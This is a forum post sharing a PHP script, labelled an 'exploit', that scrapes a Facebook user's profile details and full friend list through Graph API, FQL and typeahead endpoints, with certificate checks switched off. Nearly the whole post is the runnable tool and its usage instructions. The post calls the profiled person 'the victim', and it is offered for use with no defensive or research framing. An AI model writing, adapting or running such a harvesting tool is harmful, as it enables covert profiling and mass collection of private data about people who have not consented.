1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Facebook Data Mining Utility

Discussion in 'FaceBook' started by Asif WILSON Khan, Jul 16, 2015.

  1. Asif WILSON Khan

    Asif WILSON Khan Executive VIP Jr. VIP

    Joined:
    Nov 10, 2012
    Messages:
    11,448
    Likes Received:
    32,370
    Gender:
    Male
    Occupation:
    Fun Lovin' Criminal
    Location:
    London
    Home Page:
    Facebook Data Mining Utility

    This is a php script that can be used to mine friends and metadata of a person from Facebook using their API.

    Source: https://packetstormsecurity.com/files/129918/Facebook-Data-Mining-Utility.html

    PHP:
    *NAME*: INURL API facebook
    *TIPE*: TOOL - Capturing data facebook
    *Tested on*: Linux
    *EXECUTE*: php exploit.php perfilFacebook
    *AUTOR*: Cleiton Pinheiro / NICK: GoogleINURL
    *EMAIL*: [email protected]
    *Blog*:http://blog.inurl.com.br
    *Twitter*: https://twitter.com/googleinurl
    *Fanpage*: https://fb.com/InurlBrasil
    *GIT: *https://github.com/googleinurl
    *PASTEBIN: *http://pastebin.com/u/Googleinurl
    *YOUTUBE: *https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
    *PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/

    *PRINT:*
    https://1.bp.blogspot.com/-GByN8EJG974/VKBxtKai66I/AAAAAAAADSQ/tdbuiZIZ0wI/s1600/Untitled-4.jpg
    <http://i.imgur.com/45BFlNe.png>

    *Description:*
    The script captures information through an api facebook, data that can be
    extracted: uid, username, name, first_name, middle_name, last_name, fri,
    locale, pic_small_with_logo, pic_big_with_logo, pic_square_with_logo,
    pic_with_logo, username Just to have an affinity or the User have not set
    the privacy of friends. it is possible to extract all friends of the victim.

    *Usage info:*
    php script.php {id/user}

    *Exploit:*

    <?php
    /*
    NAME: INURL API facebook
    TIPE: TOOL - Capturing data facebook
    Tested on: Linux
    EXECUTE: php exploit.php perfilFacebook
    AUTOR: Cleiton Pinheiro / NICK: GoogleINURL
    EMAIL: [email protected]
    Blog:http://blog.inurl.com.br
    Twitter: https://twitter.com/googleinurl
    Fanpage: https://fb.com/InurlBrasil
    GIT: https://github.com/googleinurl
    PASTEBIN: http://pastebin.com/u/Googleinurl
    YOUTUBE: https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
    PACKETSTORMSECURITY: http://packetstormsecurity.com/user/googleinurl/
    PRINT:
    https://1.bp.blogspot.com/-GByN8EJG974/VKBxtKai66I/AAAAAAAADSQ/tdbuiZIZ0wI/s1600/Untitled-4.jpg
    Description:
    The script captures information through an api facebook, data that can be
    extracted: uid, username, name, first_name, middle_name, last_name, fri,
    locale, pic_small_with_logo, pic_big_with_logo, pic_square_with_logo,
    pic_with_logo, username Just to have an affinity or the User have not set
    the privacy of friends. it is possible to extract all friends of the victim.
    ------------------------------------------------------
    Usage info:
    php script.php {id/user}
    ------------------------------------------------------
    #PHP Version         5.4.7
    #php5-curl           LIB
    #php5-cli            LIB
    #Apache              2.4
    #allow_url_fopen     On
    #permission          Reading
    #Operating system    LINUX
    ------------------------------------------------------
    */

    error_reporting(0);
    ini_set('display_errors'0);
    !isset(
    $_SESSION) ? session_start() : NULL;
    $_SESSION['config'] = array();
    system("command clear");
    echo 
    menu();

    function 
    getHttpResponseCode($url) {
        
    $curl curl_init();
       
    //print_r($url);
        
    curl_setopt($curlCURLOPT_URL, ($url));
        
    curl_setopt($curlCURLOPT_SSL_VERIFYPEER0);
        
    curl_setopt($curlCURLOPT_SSL_VERIFYHOST0);
        
    curl_setopt($curlCURLOPT_HEADER0);
        
    curl_setopt($curlCURLOPT_FOLLOWLOCATION0);
        
    curl_setopt($curlCURLOPT_RETURNTRANSFER1);
        
    //curl_setopt($curl, CURLOPT_PROXY,"localhost:8118");
        
    return curl_exec($curl);
    }

    if (isset(
    $argv[1]) && !empty($argv[1])) {

        
    $_SESSION['config'] = json_decode(getHttpResponseCode("
    http://graph.facebook.com/
    {$argv[1]}"), true);
        
    $_SESSION['config2'] = getHttpResponseCode("
    http://api.facebook.com/method/fql.query?query=" 
    urlencode("SELECT
    uid,username, name, first_name, middle_name, last_name, sex, locale,
    pic_small_with_logo, pic_big_with_logo, pic_square_with_logo,
    pic_with_logo, username FROM user WHERE uid =
    {$_SESSION['config']['id']}"));

        
    $xml simplexml_load_string($_SESSION['config2']);
        
    $array_ json_decode(json_encode((array) $xml), 1);
        
    $array = array($xml->getName() => $array_);
        echo

        
    "\033[1;34m
    ================================================================================================================
                                              DADOS FACEBOOK
    ================================================================================================================
    \n"
    ;
        echo 
    "\033[1;37m0x\033[0m\033[02;31mLINK:: \033[1;37m" .
    (isset(
    $_SESSION['config']['link']) ? $_SESSION['config']['link'] : NULL )
    "\n\n";
        echo 
    "\033[1;37m0x\033[0m\033[02;31mID::
    \033[1;37m
    {$array['fql_query_response']['user']['uid']}\n\n";
        echo 
    "\033[1;37m0x\033[0m\033[02;31mUSERNAME::
    \033[1;37m
    {$array['fql_query_response']['user']['username']}\n\n";
        echo 
    "\033[1;37m0x\033[0m\033[02;31mNOME::
    \033[1;37m
    {$array['fql_query_response']['user']['name']}\n\n";
        echo 
    "\033[1;37m0x\033[0m\033[02;31mPRIMEIRO NOME::
    \033[1;37m
    {$array['fql_query_response']['user']['first_name']}\n\n";
        echo 
    "\033[1;37m0x\033[0m\033[02;31mSOBRENOME::
    \033[1;37m
    {$array['fql_query_response']['user']['last_name']}\n\n";
        echo 
    "\033[1;37m0x\033[0m\033[02;31mSEXO::
    \033[1;37m
    {$array['fql_query_response']['user']['sex']}\n\n";
        echo 
    "\033[1;37m0x\033[0m\033[02;31mLOCAL::
    \033[1;37m
    {$array['fql_query_response']['user']['locale']}\n\n";
        echo 
    "\033[1;37m0x\033[0m\033[02;31mFOTO LOGO PEQUENA:: \033[1;37m" .
    urldecode($array['fql_query_response']['user']['pic_small_with_logo']) .
    "\n\n";
        echo 
    "\033[1;37m0x\033[0m\033[02;31mFOTO LOGO GRANDE:: \033[1;37m" .
    urldecode($array['fql_query_response']['user']['pic_big_with_logo']) .
    "\n\n";
        echo 
    "\033[1;37m0x\033[0m\033[02;31mFOTO LOGO:: \033[1;37m" .
    urldecode($array['fql_query_response']['user']['pic_square_with_logo']) .
    "\n\n";
        echo 
    "\033[1;37m0x\033[0m\033[02;31mFOTO:: \033[1;37m" .
    urldecode($array['fql_query_response']['user']['pic_with_logo']) .
    "\n\n\033[0m";

        echo 
    "
    http://www.facebook.com/ajax/typeahead_friends.php?u=
    {$_SESSION['config']['id']}&__a=1\n
    "
    ;
        
    $_SESSION['config3'] = getHttpResponseCode("
    http://www.facebook.com/ajax/typeahead_friends.php?u=
    {$_SESSION['config']['id']}&__a=1
    "
    );
        echo
    "================================================================================================================\n";


        
    $cont 0;
        
    $array2 = (explode('{"'$_SESSION['config3']));
        foreach (
    $array2 as $valores) {
            
    $valores =
    str_replace('],"viewer_id":0},"bootloadable":{},"ixData":[]}''',
    str_replace(',"n":"","it":null}'''$valores));
            
    $valores str_replace('"u":'"\033[1;37mURL::\033[0m\033[1;34m",
    str_replace('t":'"\033[1;37mNOME::\033[0m\033[1;34m"str_replace('"i"',
    "\033[1;37mID::\033[0m\033[1;34m"str_replace('\/''/'$valores))));
            echo 
    "\033[02;31m[\033[1;37m".$cont++."\033[02;31m]\033[0m -
    $valores\n";
        }
    } else {

        echo 
    menu() . "   Falta definir parĂ¢metro de busca, Exemplo=> php
    face.php usuario\n"
    ;
    }

    function 
    menu() {
        
    system("command clear");
        return(
    "
    \033[1;37m _____
    \033[1;37m(_____)
    \033[1;37m(\033[02;31m() ()\033[1;37m)
    \033[1;37m \   /
    \033[1;37m  \ /
    \033[1;37m  /=\
    \033[1;37m [___] / Googleinurl - [ INURL API facebook ]
    \033[1;37m0xNeither war between hackers, nor peace for the system.
    \033[1;37m0x\033[0m\033[02;31mhttp://blog.inurl.com.br
    \033[1;37m0x\033[0m\033[02;31mhttps://fb.com/InurlBrasil
    \033[1;37m0x\033[0m\033[02;31mhttp:[email protected]\033[0m
    [+] Pesquisa dados facebook, Ex: php face.php zuck
    "
    );


    Source: https://packetstormsecurity.com/files/129918/Facebook-Data-Mining-Utility.html
     
    • Thanks Thanks x 3